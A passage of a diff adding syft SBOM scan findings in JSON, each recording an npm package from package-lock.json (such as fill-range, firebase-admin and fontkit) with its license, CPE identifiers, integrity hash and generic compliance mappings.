"4d9064c107e69a4e", + "name": "fdir", + "version": "6.5.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:fdir:fdir:6.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/fdir@6.5.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz", + "integrity": "sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7b56dfc5637424f2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: fflate 0.8.2", + "title": "fflate 0.8.2", + "description": "Package discovered: fflate 0.8.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ad8b63b86fd3ee37", + "name": "fflate", + "version": "0.8.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:fflate:fflate:0.8.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/fflate@0.8.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/fflate/-/fflate-0.8.2.tgz", + "integrity": "sha512-cPJU47OaAoCbg0pBvzsgpTPhmhqI5eJjh/JIu8tPj5q+T7iLvW/JAYUqmE7KOB4R1ZyEhzBaIQpQpardBF5z8A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d2d1a258c47b4e8a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: fill-range 7.1.1", + "title": "fill-range 7.1.1", + "description": "Package discovered: fill-range 7.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "adf22420cd3811ab", + "name": "fill-range", + "version": "7.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:fill-range:fill-range:7.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fill-range:fill_range:7.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fill_range:fill-range:7.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fill_range:fill_range:7.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fill:fill-range:7.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:fill:fill_range:7.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/fill-range@7.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", + "dependencies": { + "to-regex-range": "^5.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0d132a7f95881c19", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: finalhandler 1.3.2", + "title": "finalhandler 1.3.2", + "description": "Package discovered: finalhandler 1.3.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "257d2278606af57b", + "name": "finalhandler", + "version": "1.3.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:finalhandler:finalhandler:1.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/finalhandler@1.3.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/finalhandler/-/finalhandler-1.3.2.tgz", + "integrity": "sha512-aA4RyPcd3badbdABGDuTXCMTtOneUCAYH/gxoYRTZlIJdF0YPWuGqiAsIrhNnnqdXGswYk6dGujem4w80UJFhg==", + "dependencies": { + "debug": "2.6.9", + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "on-finished": "~2.4.1", + "parseurl": "~1.3.3", + "statuses": "~2.0.2", + "unpipe": "~1.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a37c455231ce6925", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: find-up 4.1.0", + "title": "find-up 4.1.0", + "description": "Package discovered: find-up 4.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "dde504db4cea8c91", + "name": "find-up", + "version": "4.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:find-up:find-up:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:find-up:find_up:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:find_up:find-up:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:find_up:find_up:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:find:find-up:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:find:find_up:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/find-up@4.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", + "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", + "dependencies": { + "locate-path": "^5.0.0", + "path-exists": "^4.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6285de3b3f3c2477", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: firebase-admin 12.7.0", + "title": "firebase-admin 12.7.0", + "description": "Package discovered: firebase-admin 12.7.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "01aea657af389bb4", + "name": "firebase-admin", + "version": "12.7.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:firebase-admin:firebase-admin:12.7.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:firebase-admin:firebase_admin:12.7.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:firebase_admin:firebase-admin:12.7.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:firebase_admin:firebase_admin:12.7.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:firebase:firebase-admin:12.7.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:firebase:firebase_admin:12.7.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/firebase-admin@12.7.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/firebase-admin/-/firebase-admin-12.7.0.tgz", + "integrity": "sha512-raFIrOyTqREbyXsNkSHyciQLfv8AUZazehPaQS1lZBSCDYW74FYXU0nQZa3qHI4K+hawohlDbywZ4+qce9YNxA==", + "dependencies": { + "@fastify/busboy": "^3.0.0", + "@firebase/database-compat": "1.0.8", + "@firebase/database-types": "1.0.5", + "@types/node": "^22.0.1", + "farmhash-modern": "^1.1.0", + "jsonwebtoken": "^9.0.0", + "jwks-rsa": "^3.1.0", + "node-forge": "^1.3.1", + "uuid": "^10.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a972164b3d990123", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: follow-redirects 1.16.0", + "title": "follow-redirects 1.16.0", + "description": "Package discovered: follow-redirects 1.16.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a8847fd98501e6bd", + "name": "follow-redirects", + "version": "1.16.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:follow-redirects:follow_redirects:1.16.0:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/follow-redirects@1.16.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.16.0.tgz", + "integrity": "sha512-y5rN/uOsadFT/JfYwhxRS5R7Qce+g3zG97+JrtFZlC9klX/W5hD7iiLzScI4nZqUS7DNUdhPgw4xI8W2LuXlUw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a2e20f1dd4ff167a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: fontkit 2.0.4", + "title": "fontkit 2.0.4", + "description": "Package discovered: fontkit 2.0.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "83c2ace663a40ea8", + "name": "fontkit", + "version": "2.0.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:fontkit:fontkit:2.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/fontkit@2.0.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/fontkit/-/fontkit-2.0.4.tgz", + "integrity": "sha512-syetQadaUEDNdxdugga9CpEYVaQIxOwk7GlwZWWZ19//qW4zE5bknOKeMBDYAASwnpaSHKJITRLMF9m1fp3s6g==", + "dependencies": { + "@swc/helpers": "^0.5.12", + "brotli": "^1.3.2", + "clone": "^2.1.2", + "dfa": "^1.2.0", + "fast-deep-equal": "^3.1.3", + "restructure": "^3.0.0", + "tiny-inflate": "^1.0.3", + "unicode-properties": "^1.4.0", + "unicode-trie": "^2.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0277ddadc8ca9fad", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: foreground-child 3.3.1", + "title": "foreground-child 3.3.1", + "description": "Package discovered: foreground-child 3.3.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "be5a9ebbd8259fbe", + "name": "foreground-child", + "version": "3.3.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:foreground-child:foreground-child:3.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:foreground-child:foreground_child:3.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:foreground_child:foreground-child:3.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:foreground_child:foreground_child:3.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:foreground:foreground-child:3.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:foreground:foreground_child:3.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/foreground-child@3.3.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.1.tgz", + "integrity": "sha512-gIXjKqtFuWEgzFRJA9WCQeSJLZDjgJUOMCMzxtvFq/37KojM1BFGufqsCy0r4qSQmYLsZYMeyRqzIWOMup03sw==", + "dependencies": { + "cross-spawn": "^7.0.6", + "signal-exit": "^4.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + 